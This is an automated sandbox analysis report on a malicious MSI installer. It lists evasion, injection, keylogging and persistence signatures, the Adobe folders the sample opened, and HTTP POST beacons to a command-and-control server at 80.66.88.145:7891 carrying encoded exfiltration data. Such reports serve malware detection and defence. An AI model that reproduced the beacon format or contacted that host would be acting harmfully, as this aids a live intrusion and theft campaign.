Windows Analysis Report
15e7232gfN.msi

Overview

General Information

Sample Name:	15e7232gfN.msi
Original Sample Name:	6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70.msi
Analysis ID:	1280109
MD5:	247a8cc39384e93d258360a11381000f
SHA1:	23893f035f8564dfea5030b9fdd54120d96072bb
SHA256:	6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Connects to many ports of the same IP (likely port scanning)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses known network protocols on non-standard ports

Creates a thread in another existing process (thread injection)

Queries the volume information (name, serial number etc) of a device

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Found dropped PE file which has not been started or loaded

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries information about the installed CPU (vendor, model number etc)

Queries the product ID of Windows

AV process strings found (often used to terminate AV products)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Creates a start menu entry (Start Menu\Programs\Startup)

Yara detected Keylogger Generic

Checks for available system drives (often done to infect USB drives)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection

Multi AV Scanner detection for domain / URL

Source: http://80.66.88.145:7891/	Virustotal: Detection: 5%			Perma Link
Source: http://80.66.88.145	Virustotal: Detection: 6%			Perma Link

Source:	Binary string: wntdll.pdbUGP source: Autoit3.exe, 00000008.00000003.560148976.00000000040A4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.559476358.00000000041B6000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567350269.000000000422C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565109229.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.591225500.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.599283405.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.595824245.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.708417301.0000000005060000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.819052364.0000000008560000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685301980.00000000083D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Autoit3.exe, 00000008.00000003.560148976.00000000040A4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.559476358.00000000041B6000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567350269.000000000422C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565109229.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.591225500.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.599283405.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.595824245.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.708417301.0000000005060000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.819052364.0000000008560000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685301980.00000000083D0000.00000004.00001000.00020000.00000000.sdmp

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004089B0 FindFirstFileA,		9_2_004089B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00408AB8 FindFirstFileA,		9_2_00408AB8

Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File opened: C:\Program Files (x86)\adobe\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\	Jump to behavior

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 80.66.88.145 ports 7891,1,7,8,9,9999

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49770

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: RISS-ASRU RISS-ASRU

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 658Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 45 79 6c 63 45 37 6c 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 61 44 79 6c 63 45 37 43 63 45 4f 72 62 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 34 63 45 4f 6c 61 6f 33 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 44 35 6c 63 45 33 72 63 45 4f 72 62 6f 4f 6c 61 44 6b 6c 63 45 37 34 63 45 4f 34 63 45 4f 6c 61 25 32 42 4d 6c 63 45 59 72 63 45 4f 38 61 45 4f 6c 63 44 4f 6c 63 45 78 36 63 45 4f 68 62 45 4f 6c 61 25 32 42 78 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 48 6b 6c 63 45 33 58 63 45 4f 72 58 25 32 42 4f 6c 63 44 4f 6c 63 45 6b 6c 63 45 4f 72 63 6f 4f 6c 61 44 59 6c 63 45 66 6d 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 6f 4f 6c 61 4b 6b 6c 63 45 6b 34 63 45 4f 43 61 6f 4f 6c 61 45 37 6c 63 45 78 4a 63 45 4f 36 63 25 32 42 4f 6c 61 6f 78 6c 63 45 78 36 63 45 4f 36 63 44 4f 6c 61 45 6b 6c 63 45 78 43 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 72 61 45 4f 6c 63 44 4f 6c 63 45 37 36 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 66 50 63 45 4f 72 61 25 32 42 4f 6c 63 44 4f 6c 63 45 41 65 63 45 4f 36 63 25 32 42 4f 6c 61 45 35 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 63 44 4f 6c 63 45 33 72 63 45 4f 68 63 44 4f 6c 61 48 33 6c 63 45 66 65 63 45 4f 34 63 45 4f 6c 61 25 32 42 37 6c 63 45 37 68 63 45 4f 68 61 25 32 42 4f 6c 63 48 6b 6c 63 45 33 36 63 45 4f 68 62 45 4f 6c 61 44 6b 6c 63 45 66 65 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 47 50 63 45 4f 72 63 25 32 42 4f 6c 61 48 33 6c 63 45 66 65 63 45 52 5a 63 66 68 43 25 32 42 44 66 5a 68 53 30 38 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aEylcE7lcEOhcEOlaHYlcE3JcEOrc%2BOlaDylcE7CcEOrboOlaH3lcEfPcEO4cEOlao3lcE36cEOhcDOlaD5lcE3rcEOrboOlaDklcE74cEO4cEOla%2BMlcEYrcEO8aEOlcDOlcEx6cEOhbEOla%2BxlcE36cEOhcDOlaHklcE3XcEOrX%2BOlcDOlcEklcEOrcoOlaDYlcEfmcEOrcoOlaD7lcE36cEO4cEOlcHxlcESlcEO6aoOlaKklcEk4cEOCaoOlaE7lcExJcEO6c%2BOlaoxlcEx6cEO6cDOlaEklcExCcEO4cEOlcHxlcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOraEOlcDOlcE76cEOhc%2BOlaD5lcEfPcEOra%2BOlcDOlcEAecEO6c%2BOlaE5lcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOhcDOlcDOlcE3rcEOhcDOlaH3lcEfecEO4cEOla%2B7lcE7hcEOha%2BOlcHklcE36cEOhbEOlaDklcEfecEOhc%2BOlaD5lcEGPcEOrc%2BOlaH3lcEfecERZcfhC%2BDfZhS08nz&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 1054Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 45 79 6c 63 45 37 6c 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 61 44 79 6c 63 45 37 43 63 45 4f 72 62 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 34 63 45 4f 6c 61 6f 33 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 44 35 6c 63 45 33 72 63 45 4f 72 62 6f 4f 6c 61 44 6b 6c 63 45 37 34 63 45 4f 34 63 45 4f 6c 61 25 32 42 4d 6c 63 45 59 72 63 45 4f 38 61 45 4f 6c 63 44 4f 6c 63 45 78 36 63 45 4f 68 62 45 4f 6c 61 25 32 42 78 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 48 6b 6c 63 45 33 58 63 45 4f 72 58 25 32 42 4f 6c 63 44 4f 6c 63 45 6b 6c 63 45 4f 72 63 6f 4f 6c 61 44 59 6c 63 45 66 6d 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 6f 4f 6c 61 4b 6b 6c 63 45 6b 34 63 45 4f 43 61 6f 4f 6c 61 45 37 6c 63 45 78 4a 63 45 4f 36 63 25 32 42 4f 6c 61 6f 78 6c 63 45 78 36 63 45 4f 36 63 44 4f 6c 61 45 6b 6c 63 45 78 43 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 72 61 45 4f 6c 63 44 4f 6c 63 45 37 36 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 66 50 63 45 4f 72 61 25 32 42 4f 6c 63 44 4f 6c 63 45 41 65 63 45 4f 36 63 25 32 42 4f 6c 61 45 35 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 63 44 4f 6c 63 45 33 72 63 45 4f 68 63 44 4f 6c 61 48 33 6c 63 45 66 65 63 45 4f 34 63 45 4f 6c 61 25 32 42 37 6c 63 45 37 68 63 45 4f 68 61 25 32 42 4f 6c 63 48 6b 6c 63 45 33 36 63 45 4f 68 62 45 4f 6c 61 44 6b 6c 63 45 66 65 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 47 50 63 45 4f 72 63 25 32 42 4f 6c 61 48 33 6c 63 45 66 65 63 45 52 5a 63 66 72 56 44 6e 41 46 44 37 74 30 25 33 44 59 52 79 44 77 47 46 25 33 44 51 41 39 25 33 44 6f 53 64 58 61 52 4c 54 45 33 72 63 45 4f 64 58 37 4f 34 25 32 42 44 78 6c 54 4b 45 70 76 42 52 32 54 45 78 64 58 62 44 34 6a 47 6f 5a 61 4b 78 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 66 52 63 45 4f 68 63 25 32 42 4f 6c 61 48 33 6c 63 45 33 72 63 45 4f 68 61 45 4f 6c 63 44 4f 6c 63 45 78 34 63 45 4f 72 63 6f 4f 6c 61 25 32 42 59 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 63 44 4f 6c 63 45 78 43 63 45 4f 72 62 6f 4f 6c 61 25 32 42 59 6c 63 45 37 6c 63 45 4f 72 58 25 32 42 4f 6c 61 44 79 6c 63 45 37 4a 63 45 4f 34 63 45 4f 6c 61 45 79 6c 63 45 33 43 63 45 4f 72 63 6f 4f 6c 61 25 32 42 4f 6c 63 45 37 43 63 45 4f 72 61 6f 4f
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 81Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 53 6c 63 45 37 36 63 45 4f 72 6c 6f 4f 6c 6e 45 52 5a 61 37 76 72 6e 51 49 46 48 77 43 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoSlcE76cEOrloOlnERZa7vrnQIFHwC&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 460Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 53 6c 63 45 37 36 63 45 4f 72 6c 6f 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 51 49 46 48 77 72 5a 63 6f 33 4a 63 45 59 6a 63 45 4f 72 63 6e 72 4c 44 76 25 32 42 77 44 77 45 77 6e 45 78 77 61 6e 68 6c 6e 45 52 5a 61 25 32 42 4d 4a 63 65 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoSlcE76cEOrloOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnQIFHwrZco3JcEYjcEOrcnrLDv%2BwDwEwnExwanhlnERZa%2BMJce&act=1001
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 145Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 51 49 46 48 77 43 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnQIFHwC&act=1000
Source: global traffic	HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 524Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 51 49 46 48 77 72 5a 63 6f 33 4a 63 45 59 6a 63 45 4f 72 63 6e 72 4c 44 76 25 32 42 77 44 77 45 77 6e 45 78 77 61 6e 68 6c 6e 45 52 5a 61 25 32 42 4d 4a 63 65 26 61 63 74 3d 31 30 30 31 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnQIFHwrZco3JcEYjcEOrcnrLDv%2BwDwEwnExwanhlnERZa%2BMJce&act=1001
